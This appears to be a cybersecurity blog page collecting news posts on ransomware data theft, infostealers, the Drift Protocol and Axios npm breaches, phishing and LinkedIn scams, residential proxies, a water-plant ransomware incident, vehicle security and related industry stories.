Search This Blog

Powered by Blogger.

Blog Archive

Labels

Footer About

Footer About

Labels

Showing posts with label Cyber Security. Show all posts

Why Backups Alone Can No Longer Protect Against Modern Ransomware




For a long time, ransomware incidents have followed a predictable pattern. An organization’s systems are locked, critical files become inaccessible, operations slow down or stop entirely, and leadership must decide whether to recover data from backups or pay a ransom.

That pattern still exists today, but recent findings show that the threat has evolved into multiple forms.

A recent industry report based on hundreds of real-world incident response cases reveals that attackers are increasingly moving toward a different strategy. Instead of encrypting data, many are now stealing it and using it for extortion. These “data-only” attacks have increased sharply, rising from just 2 percent of cases to 22 percent within a year, representing an elevenfold jump.

This trend is also reflected in broader industry data. The Verizon 2025 Data Breach Investigations Report treats both encrypted and non-encrypted ransomware incidents as part of a single extortion category. According to its findings, ransomware was involved in 44 percent of the breaches it studied.


Why resilience needs to be redefined

These developments highlight a critical issue. Many organizations still treat ransomware mainly as a problem of restoring operations. Their focus is often on how quickly systems can be brought back online, whether backups are secure, and how much downtime can be managed.

While these factors remain relevant, they are no longer enough to address the full scope of risk.

When attackers shift their focus from disabling systems to stealing sensitive information, the situation changes completely. The priority is no longer just restoring access to systems. Instead, organizations must immediately understand what data has been taken, who owns it, and how sensitive it is.

This includes identifying whether the exposed information involves customer records, regulated datasets, intellectual property, or internal communications. It also requires knowing where that data was stored, whether in primary systems, cloud services, third-party platforms, or legacy storage that may have been retained unnecessarily.

If leadership teams cannot quickly answer these questions, restoring systems will not prevent further damage, including regulatory consequences, reputational harm, or legal exposure.


Data theft is becoming the main objective

Additional reporting reinforces this shift. Data from Coveware shows that in the second quarter of 2025, data exfiltration occurred in 74 percent of ransomware incidents. The company noted that in many cases, stealing data has become the central objective rather than just a step before encryption.

Attackers are no longer focused only on disruption. Instead, they are aiming to maximize pressure by using stolen data as leverage.


Encryption still exists, but its role is changing

This does not mean that encryption-based attacks have disappeared. Many ransomware operations still use a “double extortion” approach, where they both lock systems and steal data.

However, the key change is that data theft alone can now be enough to force payment. This reduces the effectiveness of relying solely on backups as a defense strategy.

Organizations such as the Cybersecurity and Infrastructure Security Agency continue to stress the importance of maintaining secure and offline backups that are regularly tested. At the same time, they warn that cloud-based backups can fail if compromised data is synchronized back into the system and overwrites clean versions.

This underlines a broader reality: restoring systems is only one part of true resilience.


Moving beyond a recovery-focused mindset

The cybersecurity industry is gradually adjusting to these changes. There is a growing emphasis on protecting and understanding data, rather than focusing only on system recovery.

This reflects a more dynamic turn of events. Resilience is no longer just about recovering from an attack. It is about reducing uncertainty about data exposure before an incident occurs.

However, many organizations still measure their preparedness using disaster recovery metrics such as recovery time objectives and backup testing. Even service providers often frame ransomware readiness in these terms.

In a data-driven threat environment, a more meaningful measure of security maturity is whether an organization truly understands its data. This includes knowing where sensitive information is stored, how it moves across systems, who has access to it, and whether it needs to be retained.

Guidance from the National Institute of Standards and Technology supports this approach. Its Cybersecurity Framework 2.0 recommends maintaining detailed inventories of data, including its type, ownership, origin, and location. It also emphasizes lifecycle management, such as securely deleting unnecessary data and reducing redundant systems that increase exposure.

NIST’s incident response guidance further highlights that organizations with clear data inventories are better equipped to determine what information may have been affected during a breach.


The hidden risk of data sprawl

A major challenge for many organizations is uncontrolled data growth. Sensitive information is often copied across multiple platforms, including cloud storage, collaboration tools, shared drives, employee devices, and third-party services.

At the same time, outdated data is rarely deleted, often because responsibility for doing so is unclear. Access permissions also tend to expand over time without proper review.

As a result, organizations may appear prepared due to strong backup systems, while actually carrying significant hidden risk due to poorly managed data.


The bigger strategic lesson

The key takeaway is not that backups are unimportant. They remain a critical part of cybersecurity. However, they solve a different problem.

Backups help restore systems after disruption. They do not protect against the consequences of stolen data, such as loss of confidentiality, reputational damage, or reduced negotiating power during an extortion attempt.

To address modern threats, resilience must become more focused on data. This includes better classification of sensitive information, stronger access controls, improved visibility across cloud and third-party systems, and stricter data retention practices to reduce unnecessary exposure.

Organizations also need to communicate more clearly with leadership and stakeholders about the difference between operational recovery and true resilience.

Ultimately, the organizations best prepared for modern ransomware are not just those that can recover quickly, but those that already understand their data well enough to respond immediately.

In today’s environment, the gap between having backups and truly understanding data is where attackers gain their advantage.

Beyond Basic Monitoring: Why 2026 Demands Advanced Credential Defense

 

In today's cybersecurity landscape, stolen credentials represent a paramount threat, with infostealers harvesting 4.17 billion credentials in 2025 alone. A Lunar survey reveals that 85% of organizations view them as a high or very high risk, ranking them among the top three priorities for 62% of enterprises. Yet, many still rely on basic, checkbox-style monitoring tools that fail to address the evolving sophistication of attacks. 

Traditional breach monitoring focuses narrowly on data breaches while overlooking infostealer logs, combolists, and underground marketplaces. These tools suffer from high latency, stale data, and a lack of automation or forensic details like compromised accounts, infected devices, or stolen session cookies. Only 32% of surveyed enterprises use dedicated solutions, while 17% have none, leaving critical blind spots.IBM reports credential-related breaches cost $4.81-4.88 million on average. 

Modern infostealers like LummaC2 and AMOS bypass MFA and EDR by targeting active session tokens from unmanaged devices, enabling attackers to access accounts without passwords. Monthly checks cannot match the speed and scale of these threats, which evade detection through non-forensic data and ultra-low prices (ULPs) on dark web forums. This "breach monitoring paradox" persists even among knowledgeable teams.

To counter this, organizations must adopt continuous, normalized monitoring across breaches, stealer logs, and channels for a deduplicated exposure view. Targeted automation reduces false positives, prioritizing high-risk identities and sessions.Integrating behavioral analysis and session integrity checks detects post-authentication anomalies. AWS environments highlight similar issues, where manual monitoring fails against dynamic changes and 24/7 threats. 

Redefining breach monitoring as an ongoing program—beyond one-off products—delivers visibility, context, and automated playbooks. In 2026, with AI-powered attacks rising and detection times averaging 132 days, proactive strategies are essential. Enterprises ignoring this shift risk catastrophic losses amid infostealer proliferation.

Zoho Books Dispute Highlights Third-Party Payment Error Impacting FlexyPe Transactions

 

A conflict involving the fintech firm FlexyPe and the accounting platform Zoho has highlighted potential dangers when external tools connect to financial platforms. Problems emerged following inconsistencies found in FlexyPe's payment logs, which it first linked to flaws within Zoho Books. 

Out of the blue, FlexyPe's Azeem Hussain shared that a hands-on review of financial records showed some transaction failures wrongly labeled as completed. Because of this mismatch, around ₹3.8 lakh appeared logged in Zoho Books as paid - though the money never arrived. While checking entries line by line, the team spotted the gap between system data and real bank inflows. Since then, corrections have been made to reflect what actually moved through the accounts. 

Still nothing arrived, yet Zoho claimed otherwise, Hussain noted - wondering just how many months slipped by undetected. Processing vast numbers of transactions every day, the company now examines its finances more deeply, tracing back twenty-four months to uncover further mismatches that might exist. Still, Zoho pushed back hard against the allegations, insisting the fault lay elsewhere. 

Its official statement pointed to a different source: problems emerged not from inside its own systems. Instead, trouble began when Cashfree Payments - handling payments externally - marked failed attempts as complete. This mismatch fed faulty data into FlexyPe’s records. The result? Discrepancies piled up where numbers should have balanced. Zoho pointed out how its staff helped FlexyPe trace the core problem, while mentioning Cashfree’s public admission of the flaw. 

Although the inquiry wasn’t finished, FlexyPe aired accusations online - a move Zoho called premature. Because of this, the firm views those statements as inaccurate, which might lead to legal steps. Now, questions arise about timing, given the early release of unverified details by one party. Cashfree Payments addressed the matter, stating they found the problem within their system and are now moving forward with corrective steps. 

While building a lasting answer, a short-term adjustment went live to keep FlexyPe running smoothly. Even after clear explanations, legal steps are being prepared by Hussain to claim back money lost because of the event. What happened shows why checking records carefully matters - especially when outside software plays a key role in handling finances. When companies depend more on linked systems, this event shows how small connection mistakes might trigger serious problems in operations and costs.

North Korean Group Allegedly Orchestrates $270M Drift Protocol Hack After Months-Long Infiltration

 

A sophisticated intelligence campaign spanning six months reportedly led to the $270 million breach of Drift Protocol, with investigators linking the operation to a North Korean state-backed threat group. The details were revealed in an incident update shared by the protocol’s team on Sunday.

According to the report, the attackers initiated contact in fall 2025 during a prominent cryptocurrency conference. They posed as representatives of a quantitative trading firm interested in integrating with Drift. The group demonstrated strong technical expertise, credible professional histories, and a deep understanding of the platform’s functionality. Communication soon moved to a Telegram group, where discussions over trading strategies and vault integrations continued for months—mirroring typical onboarding processes for DeFi trading firms.

Between December 2025 and January 2026, the group successfully onboarded an Ecosystem Vault, participated in multiple collaborative sessions, invested more than $1 million of their own funds, and established a seemingly legitimate operational role within the ecosystem.

Drift contributors also met members of the group in person at several major global industry events through February and March. By the time the exploit occurred on April 1, the relationship had developed over nearly half a year.

Investigators believe the breach stemmed from two primary attack vectors.

One of these involved a malicious TestFlight application—Apple’s platform for distributing pre-release apps outside the App Store’s standard review process—which the attackers presented as their wallet solution.

The second vector exploited a known vulnerability in widely used development tools VSCode and Cursor. Security researchers had flagged this issue since late 2025, noting that simply opening a file or folder could trigger silent execution of malicious code without any warning.

After gaining access to contributor devices, the attackers were able to secure the required approvals for a multisig transaction. These pre-authorized transactions remained inactive for over a week before being executed on April 1, allowing the attackers to siphon $270 million from Drift’s vaults in less than a minute.

The attack has been attributed to UNC4736, a group associated with North Korea and also known as AppleJeus or Citrine Sleet. This conclusion is based on blockchain transaction trails linked to previous Radiant Capital attacks, as well as similarities in operational tactics tied to known DPRK-linked actors.

Interestingly, individuals who attended conferences and interacted in person were not North Korean nationals. Experts note that such groups often deploy intermediaries with carefully crafted identities, complete with credible employment records and professional networks designed to pass scrutiny.

In response, Drift has advised other DeFi protocols to reassess their security frameworks, particularly access controls. The team emphasized that any device involved in multisig governance should be treated as a potential point of compromise.

The incident raises broader concerns for the industry. Multisig systems are widely relied upon as a core security mechanism, but this case highlights their limitations. If attackers are prepared to invest months, significant capital, and real-world interactions to build trust within a platform, it challenges the effectiveness of existing security models in detecting such deeply embedded threats.

Gmail Address Change Feature Fails to Address Core Security Risks, Report Warns

 

A recent update by Google allowing users to change their Gmail address has drawn attention, but cybersecurity experts say it does little to solve deeper issues tied to email privacy and security. 

The feature, which has gained visibility following its rollout in the United States, lets users modify their primary Gmail address while keeping the old one active as an alias. 

The change has been framed as a way to move beyond outdated or inappropriate usernames created years ago. Google CEO Sundar Pichai highlighted the shift in a public post, noting that users no longer need to be tied to early-era email identities. 

However, experts say the update does not address the main problem facing email users today, widespread exposure of email addresses to marketers, data brokers and cybercriminals. 

Once an email address is used online, it is likely to be stored across multiple databases, making it a long-term target for spam and phishing attempts. Changing the visible username does not remove that exposure, especially since older addresses continue to function. 

Jake Moore, a cybersecurity specialist at ESET, said the ability to edit email addresses reflects a broader shift in how digital identity works, but warned it could introduce new risks. “Old addresses will still work as aliases,” he said, adding that this could increase the risk of impersonation and phishing attacks. 

Security researchers also point to the absence of a built-in privacy feature similar to Apple’s “Hide My Email,” which allows users to generate disposable email addresses for sign-ups and online transactions. These temporary addresses can be disabled at any time, limiting long-term exposure. 

Without a comparable system, Gmail users who change their address may still need to share their primary email widely, continuing the cycle of data exposure. 

The update may also create new vulnerabilities in the short term. Cybersecurity reports indicate that attackers are already using the feature as a lure in phishing campaigns, sending emails that direct users to fake login pages designed to steal account credentials. 

There are also early signs of increased spam activity. Online forums have reported a rise in unwanted emails, with some researchers suggesting the address change feature could allow attackers to bypass existing spam filters and start fresh. 

According to security researchers cited by industry outlets, many email filtering systems rely heavily on known sender addresses. 

If attackers rotate or modify those addresses, they may temporarily evade detection until new filters are applied. At the same time, changing a Gmail address does not stop unwanted messages from reaching the original account, since it remains active in the background. 

Experts say the update highlights a broader issue in email security. While giving users more flexibility over their identity, it does not reduce reliance on a single, permanent address that is repeatedly shared across services. 

They suggest that more effective solutions would include tools that limit how widely a primary email address is distributed, along with stronger controls over incoming messages. 

For now, users are being advised to treat emails related to the new feature with caution, particularly those that include links to account settings, as these may be part of phishing attempts.

Why Restarting Your Smartphone Daily Can Improve Security and Reduce Cyber Risks

 

A daily routine most overlook could strengthen phone security in ways people rarely consider. Spurred by recent suggestions from Anthony Albanese, turning off mobile devices briefly each day is gaining notice among experts. Moments of complete shutdown, though small, disrupt potential digital intrusions before they take hold. Some risks fade simply because systems reset, clearing temporary weaknesses. What seems minor may actually reduce exposure over time. Brief downtime gives software a chance to shed lingering vulnerabilities. Officials now highlight this pause as both practical and effective. Restarting cuts connection threads hackers might exploit unnoticed. Even short breaks in operation tighten overall defenses. The act itself costs nothing, yet builds resilience through repetition. 

Though dismissed by some as old-fashioned, rebooting your device still holds value against modern digital threats. Security specialist Priyadarsi Nanda points out that such a step interrupts harmful background activities. On either platform - be it Apple’s system or Google’s - it makes intrusion less likely. One simple restart, oddly enough, weakens active exploits. Most times, turning a phone off and on removes short-lived glitches inside the system. Though an app seems inactive, it might still trigger unseen tasks behind the scenes. 

Under certain conditions, hackers take advantage of these lingering operations to stay connected to the hardware. A fresh start shuts every program and silent helper at once - breaking chains that sneaky actions rely upon. This tip has backing from the National Security Agency too; it suggests regular restarts to stay ahead of digital dangers. Its advice states that turning your phone off and on several times weekly may reduce exposure - not just to scams aimed at stealing data, but to complex intrusions as well. Even seemingly harmless app downloads might hide phishing traps aimed at stealing access. 

On the flip side, advanced methods like zero-click breaches take control without clicks or taps. Hidden flaws in chat platforms often open doors for these silent intrusions. A reboot won’t wipe out every trace of such stealthy code - but it may break its hold temporarily. Still, specialists point out rebooting alone won’t secure systems fully. One part of wider protection means also applying patches, steering clear of questionable websites, while relying on verified software. 

People managing confidential information might need extra steps beyond these basics. Though basic, rebooting a phone now then helps guard against shifting digital threats. Doing so each night before sleep cuts potential vulnerabilities without demanding much effort.

Public Quizlet Flashcards Raise Concerns Over Possible CBP Security Exposure

 



A set of publicly available flashcards discovered through simple online searches has sparked concern after appearing to reveal sensitive details related to facility security at U.S. Customs and Border Protection locations in Kingsville, Texas.

The flashcards were hosted on Quizlet and compiled under the title “USBP Review” in February. They remained accessible until March 20, when the set was made private shortly after an inquiry was sent to a phone number potentially linked to the account. Although the listed user appeared to be located near a CBP facility, there is no confirmation that the content was created by an active employee or contractor.

CBP has stated that its Office of Professional Responsibility is reviewing the matter, emphasizing that such reviews are routine and do not automatically indicate misconduct. Other agencies under the Department of Homeland Security, including Immigration and Customs Enforcement, did not respond to requests for comment.

If the material is found to be linked to CBP personnel, it could signal a serious lapse for an agency tasked with protecting national borders and safeguarding the country.

The flashcards included what appeared to be access codes for checkpoint doors and specific facility gates, with exact numerical combinations provided in response to direct prompts. Some gate names were not disclosed in reporting due to uncertainty over their confidentiality. Additional entries outlined immigration-related violations such as passport misuse, visa fraud, and attempts to evade checkpoints, along with associated legal consequences.

Several cards also detailed procedural workflows, including voluntary return processes, expedited removals, and warrants of removal. These entries referenced required documentation and reminded users to verify accuracy using an internal “agents Resources Page.”

Quizlet stated that it takes reports of sensitive content seriously and removes material that violates its policies, encouraging users to report concerning sets for review.

Further content within the set described the Kingsville sector’s operational scope, covering approximately 1,932 square miles across six counties. It also explained internal grid and zone systems, noting that one grid designation does not exist due to the layout of regional highways.

The flashcards additionally identified 11 operational towers in the area, including abbreviated naming formats and shared jurisdiction between certain towers. Some of these references appeared to align with the previously mentioned gate locations, increasing the potential sensitivity.

Another entry described an internal system called “E3 BEST,” which enables officers to record, investigate, and process secondary inspection cases. The system allows simultaneous database checks on individuals and vehicles and supports the creation of event records tied to enforcement outcomes.

The incident comes at a time of accelerated hiring across border enforcement agencies. CBP has offered incentives of up to $60,000 to attract recruits, while ICE has promoted similar packages, including signing bonuses and student loan repayment support. Increased recruitment may expand the use of informal study tools, raising the risk of unintended exposure.

Additional searches also surfaced other flashcard sets potentially linked to DHS-related training. These included materials on detention standards and transportation procedures, with prompts such as detainees being transported in a “safe and humane manner” and rules stating that driving under the influence is prohibited. Another set appeared to contain answers to internal training questions, including multiple-choice responses such as “Both A and C” and “All of the above.”

One user created more than 60 flashcard sets between November 2025 and February 2026, covering topics from radio codes and alphabets to more advanced areas like body-worn camera policies and immigration-related Spanish vocabulary. A more recent set included terms resembling language used in recruitment messaging, such as “the nation,” “the security,” and “the homeland.”

From a broader security perspective, the incident highlights how publicly accessible platforms can unintentionally expose operational knowledge. While no confirmed misuse has been reported, the situation underlines the importance of controlling how internal training materials are created, shared, and stored, particularly within agencies responsible for national security.

How to Spot and Avoid LinkedIn Scams: A Complete Guide to Staying Safe Online

 

Most people trust LinkedIn for connecting careers, finding jobs, or growing businesses - yet that very trust opens doors for fraudsters. Because profiles often reveal detailed backgrounds, attackers pull facts straight from bios to craft believable tricks. Spotting odd requests or sudden offers helps block risks before they grow. Awareness matters, especially when messages seem too eager or oddly timed. 

Most people come across false job listings on LinkedIn at some point. Fake recruiter accounts tend to advertise positions offering large salaries, little work, fast placement, or overseas moves. Often, these deals turn out poorly once applicants get asked for private details or required to cover costs like setup fees, instruction modules, or tools. A different but frequent method relies on deceptive messages that mimic real notifications from the platform - these contain harmful web addresses meant to capture account passwords and access codes. 

One way attackers operate now involves tailored tactics, including spear-phishing. Studying someone's online activity helps them design messages appearing genuine and familiar. Sometimes these interactions shift from LinkedIn to apps such as WhatsApp or Telegram, avoiding detection more easily. Moving communication elsewhere raises serious concerns - it typically precedes deeper manipulation. Another trend gaining ground includes scams based on fake investments or romantic connections; here, confidence grows slowly until false money offers appear, frequently tied to digital currency. Watch out for certain red flags when using professional platforms. 

When messages push you to act fast, promise big rewards, or ask for private data, stay cautious. A profile showing few contacts, missing background, or odd job timelines might not be genuine. Confirm who you're dealing with by checking corporate sites - this basic move often gets ignored. Start smart - shielding your online presence begins with straightforward habits. Click only trusted links, since risky ones open doors to trouble. Two-step login adds a layer of safety, making breaches harder. Strong passwords matter; reusing them weakens protection. 

Staying inside LinkedIn messages helps keep exchanges secure. Sharing less personal detail lowers exposure quietly. Privacy controls fine-tune who sees what - adjust them often. Safety grows when small steps add up behind the scenes. Right away, cut contact if something feels off - then alert LinkedIn about the account. 

When financial data might be exposed, changing passwords fast becomes key, while also warning your bank without delay. Even as the platform expands, threats rise at the same pace, which means staying alert matters more than any tool. Awareness acts quietly but powerfully, standing between safety and harm.

Residential Proxies Evade IP Reputation Checks in 78% of 4 Billion Sessions

 

Residential proxy networks are now evading IP‑reputation‑based security controls in a majority of malicious sessions, greatly undercutting a core pillar of network defense. A recent analysis by cybersecurity intelligence firm GreyNoise found that residential‑proxy‑routed traffic escaped IP‑reputation checks in 78% of roughly 4 billion malicious sessions over a three‑month window. Attackers rely on ordinary home and mobile‑network IP addresses passed through these proxies, making it hard for defenders to distinguish malicious scans from legitimate user traffic.

How residential proxies work 

Residential proxies route traffic through real‑world consumer devices—home routers, mobile phones, and small‑business connections—owned by ordinary users or enrolled into third‑party bandwidth‑sharing schemes. Many of these IPs are short‑lived, appearing only once or twice in attacker logs before being rotated, which prevents reputation feeds from cataloging them in time. About 89.7% of the residential IPs involved in attacks are active for under a month, with only small fractions persisting beyond two or three months.

The main problem is that IP reputation typically tags long‑running or heavily abused addresses, yet most residential proxy IPs are highly transient and geographically scattered. GreyNoise’s data shows the attacking residential IPs come from 683 different ISPs, blending with normal customer traffic and diluting any clear “bad‑IP” signal. Because attackers mainly use these proxies for low‑volume network scanning and reconnaissance instead of direct exploits, traffic patterns look benign at the network layer, letting 78% of such sessions slip past reputation‑based filters.

The study points to China, India, and Brazil as major sources of residential‑proxy traffic, with usage patterns that mirror human behavior, such as a noticeable drop in activity at night. GreyNoise identifies two main ecosystems behind these proxies: IoT botnets and compromised consumer devices whose installed software—such as free VPNs and ad‑blocking apps—secretly sells the device’s bandwidth. SDKs embedded in these apps enroll consenting or unaware users into proxy networks that monetize idle home‑network capacity.

Implications and future defenses 

The high evasion rate means relying solely on IP reputation is no longer sufficient for detecting threats routed through residential proxies. GreyNoise recommends shifting toward behavior‑based detection, including tracking sequential probing from rotating residential IPs, blocking unsupported enterprise protocols from ISP‑facing networks, and persistently fingerprinting devices even when their IP changes. Security teams will need layered analytics—combining session‑level behavior, device profiles, and protocol anomalies—to stay effective as attackers continue to exploit the camouflage of residential‑proxy infrastructure.

AMD Announces Plan to Acquire Intel in Unprecedented Industry Turn

 




Advanced Micro Devices has revealed plans to acquire long-time rival Intel Corporation, marking a dramatic reversal in one of the most enduring rivalries in the semiconductor industry.

The proposed transaction, structured entirely as a stock-based deal, signals a major shift in industry power. Once viewed as the underdog, AMD has now surpassed Intel in market valuation, and the acquisition would further cement that transition.

For over four decades, the relationship between the two companies has been defined by competition, imitation, legal disputes, and strategic overlap. AMD historically operated in Intel’s shadow, often positioning itself as a secondary supplier while attempting to challenge its dominance. In recent years, however, AMD has strengthened its position across multiple computing segments and improved investor confidence, while Intel has faced setbacks.

Intel’s struggles have included delays in manufacturing advancements, inconsistent product execution, and repeated strategic adjustments. These challenges have contributed to a broader shift in market perception, allowing AMD to close the gap and eventually move ahead in key areas.

The idea of AMD acquiring Intel would have seemed highly unlikely just a few years ago, given Intel’s long-standing dominance as the central force in the personal computing ecosystem. The potential merger now reflects how drastically that balance has changed.

If completed, integrating the two companies could present organizational and cultural challenges, given their long history as direct competitors. Leadership from AMD indicated that the combined entity could accelerate product development timelines, streamline user experience, and maintain a level of internal competition despite operating under one structure.

In its response, Intel stated that the agreement could enhance shareholder value while providing its engineering teams with clearer direction and stronger operational support to rebuild competitive product offerings.

Industry analysts are still assessing the broader implications. Historically, Intel’s scale and manufacturing capabilities positioned it at the center of the computing market, while AMD functioned as a challenger that introduced competitive pressure. That dynamic has shifted as AMD expanded its presence in servers, desktops, and mobile computing, while Intel’s recovery efforts remain ongoing.

Several practical questions remain unresolved. These include how branding will be handled, whether both product lines will continue independently, and how regulators will evaluate the consolidation of two primary x86 architecture competitors under a single entity.

Sources familiar with the matter suggest AMD may adopt a structure that retains both brands in the near term. One internal concept reportedly frames Intel as a legacy-focused division, reflecting its historical significance while redefining its position within the organization.

Investor reaction has ranged from surprise to cautious optimism. Some market participants see the potential for operational efficiency and reduced rivalry, while others are concerned that combining the two companies could limit competition in the x86 processor market.

From a regulatory perspective, the deal is likely to face scrutiny due to the potential concentration of market power. The long-standing competition between AMD and Intel has historically driven innovation and pricing balance, and its reduction could reshape industry dynamics.

The announcement comes at a time when the semiconductor sector is undergoing rapid transformation, driven by demand for artificial intelligence, high-performance computing, and evolving global supply chains. Both companies have been investing heavily in these areas, alongside competitors such as NVIDIA Corporation.

At present, the timeline for completion remains subject to regulatory approvals and further review. While the companies have indicated confidence in moving forward, the scale and implications of the deal mean that its outcome will be closely watched across the industry.

Windows 11 Faces Rising Threats from AI Malware and Critical Security Flaws

 

Pressure on Windows 11 security grows - driven by emerging AI-powered malware alongside unpatched flaws threatening companies and everyday users alike. The pace of change in digital threats becomes clearer through recent incidents, especially within large organizational networks. DeepLoad sits at the heart of recent cybersecurity worries. This particular threat skips typical download tactics altogether. 

Instead of dropping files, it operates without any - earning its "fileless" label. Users themselves become part of the breach process. By following deceptive prompts, they run benign-looking instructions in system utilities such as Command Prompt. Once executed, those inputs quietly trigger malicious activity behind the scenes. Since nothing gets written to disk, standard virus scanners often miss what's happening. 

Detection becomes difficult when there’s no file footprint to flag. After running, the malware stays active by embedding itself into system processes while reaching out to remote servers through standard Windows tools. Because it targets confidential information like passwords, its presence poses serious risks inside business environments. What makes it harder to detect is how it blends malicious activity with normal operating routines. Security teams may overlook it during routine checks due to this camouflage technique. 

Artificial intelligence makes existing threats more dangerous. Because AI-driven malware adjusts on the fly, it slips past standard detection systems. As a result, security tools struggle to keep up. With each change the malware makes, response times shrink. The gap between finding a flaw and facing an attack grows narrower by the hour. Meanwhile, security patches have been rolled out by Microsoft to fix numerous high-risk weaknesses. 

Affected are various business-focused builds of Windows 11 - both recent iterations and extended support variants. One major concern involves defects within the Routing and Remote Access Service (RRAS), where exploitation might let threat actors run harmful software from a distance. Full administrative access to compromised machines becomes possible through these gaps. Not just isolated systems feel the impact. 

That last Patch Tuesday, Microsoft fixed over eighty security gaps in its programs - problems hiding even inside tools such as Excel and Outlook. Opening an attachment wasn’t needed; sometimes, just looking at it could activate harmful code, showing how dangerous these weaknesses really are. Experts warn that even emerging AI tools, such as Microsoft Copilot, could introduce new risks if not properly secured, particularly when sensitive data is handled automatically. 

Though companies face the most attacks, regular individuals can still be affected. When new patches arrive, it helps to apply them without delay - timing often matters more than assumed. Opening unknown scripts carries risk; many breaches begin there. Unexpected requests, especially those demanding immediate steps, deserve extra skepticism. 

Change is shaping a new kind of digital danger - cleverer, slyer, built to exploit how people act just as much as system flaws. One moment it mimics trust; the next, it slips through unnoticed.

Ransomware Attack Hits North Dakota Water Plant, Operations Shifted to Manual Monitoring

 

A water treatment facility in northern North Dakota was recently targeted in a ransomware attack, prompting operators to temporarily switch to manual monitoring of system gauges.

Officials from the City of Minot confirmed on Wednesday that despite the cyber incident, the region’s drinking water remained secure. In a letter submitted to the FBI, staff reported detecting the ransomware on March 14, which led to the use of “manual procedures” for approximately 16 hours until a replacement server was installed.

Jennifer Kleen, communications and engagement manager for Minot, explained that the ransomware affected the plant’s SCADA system, “which is kind of like a dashboard system. It brings all of those gauge readings to one spot.” While manual gauge checks are part of standard practice, employees had to perform them more frequently during the system outage.

The Minot water treatment plant supplies water to the city—home to around 50,000 residents—and surrounding communities under the Northwest Area Water Supply network, reaching a total of about 80,000 users.

Authorities discovered a ransom note on the compromised SCADA server, but it did not specify any payment demand. No ransom was paid, and officials have not identified the group responsible for the attack.

Recovery efforts are nearly complete, with the facility currently relying on an older server while preparing a new system. The city noted that the incident has created “opportunities for training exercises, improved communication, and preventative system design.” In a local television interview, City Manager Tom Joyce acknowledged that he would have convened a “crisis action team” earlier, including key officials, “to ensure we’re all on the same page right away.”

Cyber threats to water utilities have been on the rise, with groups linked to countries like China and Iran frequently targeting such infrastructure. A 2024 report by the Environmental Protection Agency’s Office of Inspector General highlighted multiple vulnerabilities across U.S. water systems. Out of more than 1,000 systems assessed—serving 193 million people—97 were found to have critical or high-risk vulnerabilities, while 211 had moderate to low-risk issues, including “having externally visible open portals.”

Government bodies at both federal and state levels have been pushing for stronger cybersecurity measures in the water sector. Proposed legislation aims to help smaller utilities modernize their systems and meet updated security standards. Meanwhile, New York recently introduced “first-in-nation” cybersecurity regulations, supported by funding for water treatment facilities.

However, experts warn that implementing such upgrades can take significant time—often months or even years—leaving systems exposed in the interim. Recent geopolitical tensions, including military actions involving the United States and Israel against Iran, have further heightened concerns. Information-sharing organizations, including the Water Information Sharing and Analysis Center, recently cautioned about a “highly volatile” threat landscape, warning of possible “increased cyberattacks from Iranian state-sponsored actors, hacktivists, and cybercriminal groups aligned with Iran.”

Axios Supply Chain Attack Exposes npm Security Gaps with Token-Based Compromise

 

A breach in the Axios library - one of many relied upon in modern web development - has exposed flaws that linger beneath surface-level fixes. Through stolen access, hackers slipped harmful updates into what users assumed was safe code. This event underscores how fragile trust can be, even when systems claim stronger defenses. Progress in verifying packages and securing logins appears incomplete, given such exploits still succeed. Confidence in tools like those hosted on npm remains shaken by failures that feel both avoidable and familiar. 

A lead developer’s extended-use npm token was accessed by hackers, reports show from Huntress and Wiz. Through this entry point, altered builds of Axios emerged - versions laced with hidden code deploying a multi-system remote control tool. Not limited to one environment, the harmful update reached machines running on macOS, Windows, or Linux setups. Lasting just under three hours, the rogue releases stayed active online until taken down. 

Axios ranks among the top tools in JavaScript, downloaded more than a hundred million times each week, found in roughly eight out of ten cloud setups. Moments after the tainted update went live, malware started spreading fast; Huntress later verified infection on 135 machines while the vulnerability was active. Hidden within a third-party addition, plain-crypto-js slipped into Axios’s environment without touching its main codebase. Not through direct changes but via a concealed payload activated after installation. 

Running quietly once set up, it triggered deployment of a remote access tool on developers’ systems. Built to avoid notice, the malicious code erased itself under certain conditions. Altered components were restored automatically, masking traces left behind. One reason this breach stands out lies in its method - evading defenses thought secure. Even after adopting standard safeguards like OIDC for verified publishing and robust supply chain models, outdated tools remained active. 

A leftover npm access key opened the door despite stronger systems being in place. Where two login paths existed, preference went to the original token, rendering recent upgrades useless under that condition. This is now the third significant breach of the npm supply chain in just a few months, after events such as the Shai-Hulud incident. 

Each time, hackers used compromised maintainer login details to gain access, revealing a recurring weakness across the system. Though security professionals highlight benefits of measures like multi-factor verification and origin monitoring, these fail to block every threat when login data is exposed. 

With growing pressure, companies must examine third-party links, apply tighter rules on software setup, yet phase out outdated access methods instead. When trust rests on open-source tools, weaknesses in how credentials are handled can still invite breaches. A single event shows flaws aren’t always in the code itself - sometimes they hide where access is managed.

Cybersecurity Risks Rise as Modern Vehicles Become Complex Digital Ecosystems

 

Today’s vehicles have evolved into highly interconnected cyber-physical systems, combining mobile apps, backend infrastructure, over-the-air (OTA) update mechanisms, and AI-powered decision-making. This growing integration has significantly expanded the potential attack surface, introducing security risks that traditional IT frameworks were not designed to address. As a result, vulnerabilities are increasingly surfacing across the entire automotive ecosystem.

"Unlike a traditional IT system, like a mail server or your home network, the worst case scenario involves things like safety implications or real-world operational disruptions like closing down a road or being able to cause damage to the environment," said Kamel Ghali, vice president at Car Hacking Village.

With the shift toward software-defined vehicles and reliance on OTA updates, cars are beginning to inherit many of the same security weaknesses seen in conventional IT systems. At the same time, the integration of artificial intelligence introduces new concerns, as these models—now responsible for safety-critical decisions—must be safeguarded against manipulation or external interference, Ghali noted.

During a video interview with Information Security Media Group at the RSAC Conference 2026, Ghali further highlighted several key developments. He explained that the automotive supply chain is increasingly investing in cryptographically secure processors to gain a competitive edge. 

He also pointed out that threat modeling in the automotive sector is expanding beyond traditional IT considerations to address safety, operational continuity, and environmental impact. Additionally, he emphasized that maintaining supply chain integrity will likely emerge as the most significant long-term cybersecurity challenge for the automotive industry.

Ghali brings over seven years of expertise in automotive cybersecurity, specializing in ethical hacking, penetration testing, training, and product security. He is an active contributor to the global cybersecurity community, leads outreach initiatives for the DEF CON Car Hacking Village, and plays a key role in raising awareness about vehicle security risks.

AI Datacenter Boom Triggers Global CPU and Memory Shortages, Driving Price Hikes

 

Spurred by growing reliance on artificial intelligence, computing hardware networks are pushing chip production to its limits - shortages once limited to memory chips now affect core processors too. Because demand for AI-optimized facilities keeps climbing, industry leaders say delivery delays and cost increases may linger well into the coming decade. 

